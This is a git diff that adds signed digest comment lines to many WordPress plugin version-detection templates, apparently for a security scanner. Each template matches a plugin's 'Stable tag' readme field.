a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..bd051984af 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022008b7b0f8230439bf51057f2d6d4127782a980b51949f1449736107ba32811dcf0220210a6bcf1f8d49c97e41d7c8566ddaf0c14505f868d8d99718c5d89b2522e473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..0b5e5013df 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220451321300b7b5b0f3b968a6a99105049bd0022a5179fe4373e6eefd4957b957c0220314b87a0e1e3ead48b905ac210f082a9e883b07a9d560e7eb55a62d771cf01b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..54de0efa6d 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100cb38afb997c2bc4d645c5327b6fc7611d17adf001fc366a9692397a59ce4bd660220627c30fb381d7b6df2337648c571f8eceafe437436458984b0659fab26dad616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..79e70ec4b4 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022000938cbd10851c1adaef581979c9b6d160ffb3427ef1628f886403dcf54798a6022100da801db6645c2cfbd17d52d383030d1c4c5fc5b93630767bcefd6ef867972bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..336ec338eb 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203866b5d0604edc069313d48fbf5605e14d3697f24fe7149a6743b00aa631af3902203f1152e4ecb5216f16b51503f187769d6353f761c037b2cbd31e2dae50f028f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..d8ccd654bf 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f8e99fc2d20c78a6fc354e243dd99827523836b616acdbadd24f4c4b1568b899022034898b7a5172baf7083fa454bd2aecfef6a5f0319342ed792b9543187f154a0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..31f207bbb3 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100eda040d147e35b7f82c450c7bc1ab19fc2820ffb4fa8464909439eb02450bb010220654d92f3b16ede11f054767747bb02330dad420c5462c6221a0cc8f2e3925e35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..577b31283f 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f597e62335b1dcf9fed439c60aad2ac257226da9428d1fd3636b225a64075534022009718ac21811638e93f07100b071bedae27355d024d220fee320a6f7ee00bce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..55b1b6c927 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022006035ab9f0b94a0c508099dd6d82ab7dbe973b4d2672f57ad8d23fdd16dd7f03022100f9aeadd46bc6855c48134d1b7fea64d5acf3a8d8adcb31461d8c38f6e20c840b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..593405a0d1 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008422de103a671cb156c2eae798aa75f70fb7d6771f15312ba8c39cba122ff95302204c1a4ec5e061c2a6ad6e685aec440bc4cb025af901ff26e2ffe9f3030b7b1565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index ed3161d27c..f3d10b173e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cb49b600ed520be41d530e3599b50ef4c0c93d68fb8e7c33db95dc83473ad95e022100845c10fe1c23a65c6545b949a4c34a602ce533934ba38a41039f81c454f4ac20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..bf92f3c909 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502205de59b68eaaaffa49dbd1e5455d20a198da8473ef009684ac9c1eddd14acd88c022100f4f45976f5a238fc46f032e43e4a984eae5f1d4241ef40d18bc4eefedad0162f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..83d66e4c5c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ed58b871fd439a5cd84d2c69892cefc86bdbf2c97ba413bfceb1616c5102633f022078af7fe74e51ab05dc410194181ea6557c7d471e337e6e66405c3cd3b2d9f074:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..ab2cde2a11 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100aadfaeddb43c1cf3b4b219487ff7c8f4d34cf2148ef7cb7e50a5faff1d7f91b1022005bc47381a042eebffc36eb02932d4d94b1736fcccfc12c7b345e913e685d99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..082dfb06c7 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f3cde1efd0ac68f71bdaa0d81cfbd8702ce696af746469657f94911e80e9d178022100f4dd87c9409bd24a56ea0a80cc1e63820e82c3c7017b4a99dd98b0a2e58032e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..861eae9528 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d74091154f94398aca46e579a41aa0e4e59ff6ae56b52c19f03daca066c428e2022100e857b5a15d954cbc614146409d6d29b89c0dbcc683ef2dfa9ccadaeed05ee9db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..610f1b780a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202531d9a9e8a50e605a5d89edc7c0882156676b1981037f0b254c3d16ffe7bf0c0221008d0c35126b4fe21da7dad531a26c6aff2d4d4189c8714540957d36e1d5d7692c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..688d1c0028 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204edbb00099435847c9944a16f5e720ef068d8330c3fcb8f2484254b1c26df2a802202bc0b17fea92d34a18926457a49a28a97cbf77893d8f706739f335bf2b96d1ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index d69709b8f9..22c73506b8 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a00e2356c44a9002a9d012c0a4a286b4ed3f30677c976a824bb107631803b5fe022100dded8d83eb54144ffe623f0a7d556fbea10716072bc08eb79f83639dfc86f1ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..13557cac23 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f748cee4171e321efad955f0b254111524951d9f7be6724adfad319b4f172278022100e15cff02d23be4358ed237888799c5059222d7934563f6d4eff8453ca4acbd49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..317d724daa 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202f8d7f4ddb1d95e4b5090d5f0b3100ef870738c42d7a081373bfc0f027ff949102202089bfa39f79698aa1f775466065edf86e1d73dfed8dcbd9282dcf682ee3099f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..619d648760 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100dff3bf21e864b5986eda02a147c1122457f5076a07c27859fec4d7c7426dc74d022100840bc49273709165ab60e73754234940536fe5a032fb27d2a7f316ef373a4450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..16da9f6eb8 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220015c7203e4be0978773e393dcfa204a4617b5472a963997886a961c3d877f58c022100c7f987322e72156198cb7e8c49626955e1d0ca902f694dcd85f1eeb3bfb97328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 59a655c424..db78d62276 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009e11ddfce34ae526181d15dc7b8a96a9f515db3ab7ab9a4b14b43c410b155777022007b0db9fc78b12a6ce2432057e9caad06ef9fb1eea8120d9fe9feac692630c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..3cfca17a3e 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022024eedd90c41426b1bf84889f09d322e07dd74510f44f444a74689385bc2895a502205ed64401c7e35cf0b785e7068ef03a6244bb7742d3d07b650d27a9eb5c9e91b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..f6f3541f71 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b9fea48031538a15f4fa956090c50159793c9dbc980ec12ad89ab59d865629ed022100f78fefecb9a9eb95d383be020ea6b76fd91ce2fccb53929507d733872ac78c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..53ad504b07 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200d9239d47968836413cb7b1331d801d5e6705316c1cfc7d1bd24577a2705267302202b57e03feb4faab1d3fd5988501a32d7584deaade635387bac995ed84f06d277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..50877768ba 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fded626917992eb27ab5c2f23088c7c413bd7103b2d0ed015505253b863f0715022100deffcf4a8d851c2e22f588be0ee4e478174a8a1f3c6b6c591785d2c85cdcb0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..d60b90b48e 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206417236e32cf70ef8b3bc1e7bbbe1373f6927904dbba4669696f28a7c1a06827022100a04ccba126912ccda40f5d86f7ad49ea2832665464f3a612eca9fd02e39a86af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..5c42848763 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201e434decc67fadc6afa3004faa63bb6a7ccce10e5cef119a2af66951d85c6d6b022049f564b7bb1d2221f579d1bc7d353495f89975019001abc3a8d77af01931a230:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..281d8df0f9 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e11e5d35bf7231a501b723af75618382fcd0432829de261e733ed2168df86e7802204bdd97860034972ea6b922229c561e1125d98d287dcd96dc118e949094651437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..f8aefa350d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e523c96a093718fafe1642a2abe153d1d50fea36e3e0b83a3ba2cfba738f576a02207c9feb3bfa6201a6452d1d1e7f32e0fe200239102a0ff18a87fe8c199db86feb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..de3f9db093 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f257b874b084b2dd9094cd68962759523f67e0133dd5979bfee375fc75cd11d7022100f49c912a6bc394178a08b2999b1116ef92ace9bc0ab7408e4fbcad1b18f229c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..53be27ced2 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220165521106bfee3275e2c19b23b8128a44c3541f780bd96528555bcf2d4c116bc022100dc1caa92c726f7c64184a4a8bebcd7dce9480c7dad4308540b898dd05b1f5fd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..61b25a4bb1 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210089da94a576544bf5ae5f98c6110f58c867baf236eaf0d398c4636979e7c3e22602200a5035ebbb9506acd1171d58881cedeb7841a3a7f519725b96b376d17c5c368d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..df3bf78d7d 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fb331aeedf36a40328bb0ed5d019f3962679ba6de56123c7ea56bfa20e693bb5022100cc892149c96a230fa8a16179b27045a39b4dec487a9a3827e204e96ab3b047cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..99c26d013f 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203c003572de37ac34822997eec8e22a4e7b1581bce841954f62715829c24cfbc4022100a9ff9014521481c638c246cece1c1ad4119b10745f0ec3f202231618f0045ef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..b357cb5927 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008b01ec8f13f7c80b389a7a3274c30ef3ed8ef9a383211b4c1684087084603dbf02200db252eb3ce3579e93e6ce27f57e620786951c73524c35c209dbe6ea86d64f8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..c37177cdb1 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206d279da4c419adaef2174322867144c9c6e869513a7cbbff8aa85d0c4687673d022100d013ade7cdebd73d1ba2b99a8d419a0d3ed7411d6da5a0c9ea729b8270fdfb37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 97b7306b75..1bd3a8c9c2 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203ad26797e284d5d6bf9ba760a9f1ebd1fcd3e9bb542f1e7cae6388bf038c77cf022100dda3d5e1d765631fa9bff92cc5f1fa471262350f5c5662aa79ed44bd085dd9ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..53d9407cac 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207cbf63415009b450fc727ebb905bb5928721a63bce963382e0cea608721ec838022001da84b21f758409350ef9aefb229cb447a0f31c46e6c85f8111be52109a7191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..f7892c9ad0 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206ff7abf5a06dc291898cf58292819ee1a75959fecf20f2e7d03c8fcfd9bf654a022056dad4446abbcb65b9f71c3fafed1d2a9f0798e238639a00ff25a6cab0cde30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..e9a461e881 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f21f018dcdb11d9db41b19e923102446a0c838c960a6ffb737d5f8970c8e46e20221008c2f9eb745eaa1e9cfbd23eb8bbfc5d97ae84761cf8d2bf41b1cfe779dcd884b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..30cf3ba70f 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022004e4e4d08ef05bfaa718368711d85f53d534eb3271451cab2186e9d08d778203022075d83d3b3031cd0966b7de1a6e5e3e67ffaee3a813b7d04dc6ccbbbe19966883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..6211154a53 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205a025375f3877c16455d187ff2a3249e3f63e4dd3f1422476c85783b86ca325302201e9712acd5ba577ba2c348f1ccab577c9e67efb29d5a7fae7bb5bd47a6116a8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..bbbf42308b 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100bb06d6a8461908b031e9db1131959d31f450cbf6c75ecc10446da5fec50bb784022036cd3cd416e86449592cda9745603dee2e1db545eadb2d23bf8f1015665bcbc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..80b35751a3 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e40f9599b49b4c2dbcd701b8ddb012a5472960af7a8277f8755c5531b859e10802201092a2afa9be2de8506235528a9f050ea8e4382b6af486fffc3872c4334b4a0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..695a8af76e 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 